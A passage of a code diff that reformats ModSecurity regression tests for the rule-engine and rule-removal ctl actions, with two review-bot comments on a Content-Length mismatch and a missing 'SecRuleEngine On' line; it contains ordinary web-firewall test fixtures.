need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off\"", 
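Review bot: The rewritten `"body": [ "" ]` makes the empty body explicit, but the request still declares `"Content-Length": "12"`, so the header and the body disagree in every case of this file. The rules visible in these hunks key on `REQUEST_URI` and on `ARGS` supplied in the query string, so the mismatch looks like leftover fixture data rather than something under test. I would set `"Content-Length": "0"` or drop the header, so the fixture cannot be mistaken for a deliberate length-mismatch case. The same applies to the hunks starting at `@@ -46,45` and `@@ -92,222`.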
@@ -46,45 +48,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly\"", 
@@ -92,222 +96,232 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On\"", "SecRule ARGS \"@contains test\" \"id:2,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (4)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (4)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (5)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (5)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "12", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,log,phase:3,block,deny,status:302,ctl:RuleEngine=DetectionOnly\"" ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_by_id.json index ba89561d57..86387d804e 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_id.json 
@@ -1,66 +1,88 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (1)", - "expected":{ - "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action..." + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action...", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=1\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - 
"headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveById=123\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json index 6cf2923d58..7434ec5598 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_tag.json 
@@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '2'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=tag123\"", "SecRule ARGS \"@contains test1\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test2\" \"id:2,pass,t:trim,tag:tag123\"", 
@@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing ctl:ruleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing ctl:ruleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Skipped due to a ruleRemoveByTag action." + "expected": { + "debug_log": "Skipped rule id '3'. Skipped due to a ruleRemoveByTag action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS:key \".\" \"id:4,ctl:ruleRemoveByTag=whee\"", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json index fce492bbac..57b630d581 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_id.json 
@@ -1,167 +1,218 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (1)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (2)", + "client": { + "ip": 
"200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=123;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (3)", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + 
] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetById=1;ARGS\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,status:202,block,deny,tag:'CRS'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (4): uppercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", "Referer": "This is an attack" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule 
REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", - "expected":{ - "http_code": 200 - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoveTargetById (5): lowercase `Referer` header", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml", "referer": "This is an attack" }, - "uri":"/index.html", - "method":"GET", - "body": [ ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", - "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" + "uri": "/index.html", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@unconditionalMatch\" \"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json index fc696a5cb0..f55a7c7f9a 100644 
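Review bot: Case (3) asserts `"http_code": 200` against a `deny` rule, but its `rules` array has no `SecRuleEngine On`, unlike cases (1), (4) and (5) in the same hunk. If the engine is not enforcing by default in this harness (not visible here), the 200 is returned whether or not `ctl:ruleRemoveTargetById=1;ARGS` removed the target, so a regression in the exclusion logic would go unnoticed. I would add `"SecRuleEngine On",` as the first entry of that case's `rules` array so the test fails when the exclusion stops working.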
--- a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json
+++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json
@@ -1,99 +1,131 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (1)", - "expected":{ - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (2)", - "expected":{ - "debug_log": "Target value: .*Variable: 